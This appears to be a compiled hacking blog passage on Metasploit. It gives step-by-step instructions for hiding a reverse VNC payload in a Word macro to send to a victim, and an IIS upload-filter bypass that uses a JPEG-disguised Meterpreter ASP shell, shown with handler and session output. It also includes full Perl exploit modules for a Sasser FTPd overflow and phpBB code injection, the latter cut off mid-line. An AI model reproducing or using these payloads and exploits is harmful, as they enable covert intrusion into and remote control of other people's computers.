Metasploit: Reverse VNC hidden in a Word file

Today i will show u how to use Metasploit payload feature for Reverse VNC connection which can be hidden in a Word file and get VNC desktop of the remote user

Metasploit will create a macro for Word, which once implemented when a user opens the word file we get a reverse VNC of the target system ,where the Word file contains the macro, even antvirus cant detect It,

there is no required of VNC installed in the Victim PC
u can also do this in WAN also only thing is u should port forward ur 4444 port in ur modem or router

Lets begin

1) Create a Macro to Intergate with word

./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.147.128 V > /tmp/punter.bas

2) copy that punter.bas file in windows now go to windows
and open ur office 2003 –>tools–>macro–>visualbasic editor
then go to File–>import file–> and choose the punter.bas and save it with a name ex: macrogame.doc
now send this file to victim via mail or some other technique for this demo i will open in my system

3)now in Backtrack type this command

./msfcli multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=192.168.147.128 DisableCourtesyShell=True E

When the target on the windows open the file, it will be asked if he/she wished to accept or not run the macro, if it accepts, the connection will be initiated, and the VNC client will open on the post BackTrack.
not run the macro, if it accepts, the connection will be initiated, and the VNC client will open on the post BackTrack.

Video link for the above guide

http://blip.tv/file/1847504

http://wirelesspunter.blip.tv

Exploiting Microsoft IIS with Metasploit

First we generate an ASP script that does a Meterpreter connect-back to the system running Metasploit:

$ msfpayload windows/meterpreter/reverse_tcp \
LHOST=1.2.3.4 LPORT=8443 R | \
msfencode -o evil.asp

Now we need to configure msfconsole to accept the incoming connection:

$ msfconsole
msf> use exploit/multi/handler
msf (handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf (handler) > set LHOST 1.2.3.4
msf (handler) > set LPORT 8443
msf (handler) > set ExitOnSession false
msf (handler) > exploit -j

To avoid the image content validator, we will prepend a valid JPG image to our ASP script:

$ cat happy.jpg evil.asp > "evil.asp;.jpg"

$ file "evil.asp;.jpg"
JPEG image data, JFIF standard 1.02

Now we upload our "evil.asp;.jpg" image to the web application. Since the extension ends in "jpg" and the contents of the file appear to be a valid JPEG, the web application accepts the file and renames it to "/images/evil.asp;.jpg"

Finally, we browse to the URL of the uploaded ASP/JPG, which will execute our payload and create a new session with the msfconsole:

[*] Starting the payload handler...
[*] Started reverse handler on port 8443
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.0.xxx:8443 -> 66.234.xx.xx:1186)

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 2668 created.
Channel 1 created.
wMicrosoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

c:\windows\system32\inetsrv>whoami

nt authority\network service

Metasploit Blog

Metasploit? What is it?

What is it?
The Metasploit Framework is a development platform for creating security tools and exploits. The framework is used by network security professionals to perform penetration tests, system administrators to verify patch installations, product vendors to perform regression testing, and security researchers world-wide. The framework is written in the Ruby programming language and includes components written in C and assembler.
What does it do?
The framework consists of tools, libraries, modules, and user interfaces. The basic function of the framework is a module launcher, allowing the user to configure an exploit module and launch it at a target system. If the exploit succeeds, the payload is executed on the target and the user is provided with a shell to interact with the payload.

Metasploit 3.3 Released

Version 3.3.3 of the Metasploit Framework has been released, featuring exploit safety rankings, a smaller EXE template, the addition of the InitialAutoRunScript option for Meterpreter, and the ability to run a script or command on all open sessions (sessions -c/-s). The complete release notes are online and version 3.3.3 can obtained from this download page

The Metasploit Framework

The Metasploit Framework is a penetration testing toolkit, exploit development platform, and research tool. The framework includes hundreds of working remote exploits for a variety of platforms. Payloads, encoders, and nop slide generators can be mixed and matched with exploit modules to solve almost any exploit-related task. Metasploit is written in the Ruby scripting language and is provided under the BSD license. More information about the framework can be found on the Framework site.

The latest downloads for the Metasploit Framework can be found on the Downloads page.

The development source of the Metasploit Framework can be retrieved from Subversion with the following command:

$ svn co https://www.metasploit.com/svn/framework3/trunk/

Please see the Installation and Updating pages for help installing the framework.

New users may be interested in the Feature Guide

The Wiki index may be a good starting point

Metasploit - msvidctl_mpeg2

msvidctl_mpeg2 from 4xteam on Vimeo.

Hacking Malware [Video Tut]

http://good.net/dl/bd/defcon-14-video/Defcon14-V12-Valsmith_and_Quist-Hacking_Malware.mp4/info

HD Video

"Hacking Malware"

Sasser FTPd - Remote exploit for the FTP

By Attack Research

##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::sasser_ftpd;
use base "Msf::Exploit";
use strict;
use Pex::Text;

my $advanced = { };
my $info =
{
'Name' => 'sasser worm avserve FTP server Overflow',
'Version' => '$Revision: 1 $',
'Authors' =>
[ 'valsmith [at] metasploit.net>',
'chamuco [at] gmail.com>',
],

'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'winxp' ],
'Priv' => 0,

'AutoOpts' => { 'EXITFUNC' => 'thread' },
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 21],
'SSL' => [0, 'BOOL', 'Use SSL'],
'USER' => [1, 'DATA', 'Username', 'ftp'],
'PASS' => [1, 'DATA', 'Password', 'ftp'],
},

'Payload' =>
{
'Space' => 480,
'BadChars' => "\x00~+&=%\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e",
'Prepend' => "\x81\xc4\x54\xf2\xff\xff", # add esp, -3500
'Keys' => ['+ws2ord'],
},

'Description' => Pex::Text::Freeform(qq{
Windows sasser worm avserve ftp server exploit.
}),

'Refs' =>
[
['OSVDB', '6197']
],

'DefaultTarget' => 0,
'Targets' =>
[

['Windows XP SP1', 0x77e7633a ],
],

'Keys' => ['ftp'],

'DisclosureDate' => 'not applicable',
};

sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}

sub Check {
my ($self) = @_;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');

my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);

if ($s->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return $self->CheckCode('Connect');
}

my $res = $s->Recv(-1, 20);
$s->Close();

if ($res !~ /5\.0\.3/) {
$self->PrintLine("[*] This server does not appear to be vulnerable.");
return $self->CheckCode('Safe');
}

$self->PrintLine("[*] Vulnerable installation detected.");
return $self->CheckCode('Detected');
}

sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $target = $self->Targets->[$target_idx];

if (! $self->InitNops(128)) {
$self->PrintLine("[*] Failed to initialize the NOP module.");
return;
}


# DOS request version
# my $request = "PORT" . "\x41"x500;

my $request = "PORT". "\x90"x268 . "\xeb\x06\x90\x90" . $target .
"\xe9".pack('V',-1005) . "\x90"x15 . $shellcode . "\x90"x1530;

my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);

if ($s->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return;
}

my $r = $s->RecvLineMulti(20);
if (! $r) { $self->PrintLine("[*] No response from FTP server"); return; }
$self->Print($r);

$s->Send("USER ".$self->GetVar('USER')."\n");
$r = $s->RecvLineMulti(10);
if (! $r) { $self->PrintLine("[*] No response from FTP server"); return; }
$self->Print($r);

$s->Send("PASS ".$self->GetVar('PASS')."\n");
$r = $s->RecvLineMulti(10);
if (! $r) { $self->PrintLine("[*] No response from FTP server"); return; }
$self->Print($r);

#$s->Send("$request\n");
$s->Send("$request\n");
$r = $s->RecvLineMulti(10);
if (! $r) { $self->PrintLine("[*] No response from FTP server"); return; }
$self->Print($r);

sleep(2);
return;
}

phpBB Highlight - Remote exploit for phpBB

By Attack Research

##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::phpbb_highlight;
use base "Msf::Exploit";
use Pex::Text;
use strict;

my $advanced = { };

my $info =
{
'Name' => 'phpBB viewtopic.php Arbitrary Code Execution',
'Version' => '$Revision: 1.1 $',
'Authors' =>
[
'valsmith [at] attackresearch.com>',
'H D Moore ',
],
'Arch' => [ ],
'OS' => [ ],
'Priv' => 0,
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 80],
'VHOST' => [0, 'DATA', 'The virtual host name of the server'],
'PHPBB_ROOT' => [1, 'URL', 'The phpBB root Directory', '/phpbb'],
'SSL' => [0, 'BOOL', 'Use SSL'],
},

'Payload' =>
{
'Space' => 1024,
'Keys' => ['cmd', 'cmd_bash'],
},

'Description' => Pex::Text::Freeform(qq{
This module exploits two arbitrary PHP code execution flaws in the
phpBB forum system. The problem is that the 'highlight' parameter
in the 'viewtopic.php' script is not verified properly and will
allow an attacker to inject arbitrary code via preg_replace().
}),

'Refs' =>
[
['OSVDB', 11719],
['OSVDB', 17613],
],

'DefaultTarget' => 0,
'Targets' => [
['Autotarget',0],
['phpbb <2.0.11', 1],
['phpbb <2.0.15', 2],
],

'Keys' => ['phpBB'],
};

sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}

sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $vhost = $self->GetVar('VHOST') || $target_host;
my $cmd = $self->GetVar('EncodedPayload')->RawPayload;
my $target_idx = $self->GetVar('TARGET');
my $phpbb_root = $self->GetVar('PHPBB_ROOT');
my $user_agent = $self->GetVar('USER_AGENT');
my $target = $self->Targets->[$target_idx];
my $url;
my $byte;

# Add an echo on each end for easy output capturing
$cmd = "echo _cmd_beg_;".$cmd.";echo _cmd_end_";

# Encode the command as a set of chr() function calls

if ($target_idx == 0) {

$url = $phpbb_root."/viewtopic.php?t=1&highlight=";
$url .= "%2527"."%252e"."phpinfo()". "%252e"."%2527";

my $request =
"GET $url HTTP/1.1\r\n".
"Host: $vhost:$target_port\r\n".
"Connection: Close\r\n".
"\r\n";

$self->PrintLine("[*] Sending the malicious GET request...");
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'SSL' => $self->GetVar('SSL'),
);
if ($s->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return;
}

$s->Send($request);
my $results = $s->Recv(-1, 20);
$s->Close();

if ($results =~ /\